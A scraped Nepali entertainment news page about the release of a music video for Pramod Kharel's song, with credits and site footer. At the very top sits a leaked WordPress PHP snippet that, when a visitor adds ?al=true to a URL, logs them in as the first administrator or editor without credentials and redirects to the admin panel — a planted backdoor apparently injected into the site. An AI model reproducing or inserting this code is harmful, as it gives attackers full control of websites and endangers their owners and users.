// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); प्रमोद खरेलको बैगुनी त पराइ भयो सार्बजनिक | Celebrity Nepal

प्रमोद खरेलको बैगुनी त पराइ भयो सार्बजनिक


सेलिब्रेटी नेपाल काठमाडौँ
aasha-khadka
अहिलेका चर्चित गायक प्रमोद खरेलको आवाजमा रहेको बैगुनी त पराइ भयो..बोलको भिडियो सार्बजनिक भएको छ। बसन्ती शाहको शब्द तथा राजु सिंहको संगीत रहेको गीतमा जीवन शाहीले भिडियो निर्देशन गरेका हुन् । कलम एल्बममा समाबेश उक्त गीतमा गीत अनुसार बैगुनीले छोडेर जाँदाको पिडा लाइ भिडियोमा देखाउन खोजिएको छ । आशा खड्का,अमृत खड्का,राजन अधिकारी,भेषराज गौतमको अभिनय रहेको छ । चक्र महर्जनको छायांकन रहेको भिडियो लाइ निर्देशक जीवन स्वयम्ले सम्पादन गरेका हुन् म्युजिक ग्यालरी मार्फत भिडियो सार्बजनिक गरिएको हो ।

सेलिब्रिटी नेपाल.कम

सूचना तथा प्रसारण विभाग दर्ता नम्बर ५३७ – २०७३ / ०७४

संचालक / प्रकाशक: कल्पना सापकोटा
सम्पादक: आनन्द अधिकारी
समाचार प्रमुख: रघुनाथ सापकोटा
सम्पर्क:
call/whatsapp: +977 9851071873 | email: celebritynepal@gmail.com

Supported by Glamour Nepal | Shopping Partner: Kavya Online Store

Copyright © 2012 - 2026 | All Right Reserved.